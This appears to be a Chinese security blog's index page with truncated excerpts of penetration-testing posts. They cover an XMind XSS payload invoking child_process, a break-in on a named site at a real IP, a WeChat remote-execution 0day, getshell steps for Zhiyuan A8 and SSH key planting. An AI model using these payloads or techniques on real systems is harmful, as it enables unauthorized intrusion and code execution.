0x00 前言
测试环境:
XMind 202005082128
0x01 payload(需要在大纲板块进行触发)
<img src=x onerror="const exec = require('child_process')...
Adminxe
4年前 (2021-05-11) 3174℃ 1评论
35喜欢
0x00 CMS类型
9ccms
FOFA:
body=”久草CMS”
0x01 渗透站点
黄色站点:https://142.11.219.115/
0x02 渗透过程
后台:https://14...
Adminxe
4年前 (2021-05-10) 112176℃ 5评论
100喜欢
0x00 前言
近日,网上披露微信客户端存在远程命令执行0day漏洞。黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直...
Adminxe
4年前 (2021-04-17) 6106℃ 2评论
29喜欢
测试版本为: 致远 A8-V5 协同管理软件 V6.1SP2
自行搭建环境:
Getshell 分三步
1.获取cookie信息
2.上传压缩文件
3.解压压缩文件得到shell
获取 cookie 信息
漏洞文件
...
Adminxe
4年前 (2021-04-11) 5906℃ 0评论
5喜欢
写入公钥
1. ssh-keygen -t rsa //执行生成key命令
2. (echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > 1.txt /...
Adminxe
4年前 (2021-03-17) 719℃ 0评论
0喜欢
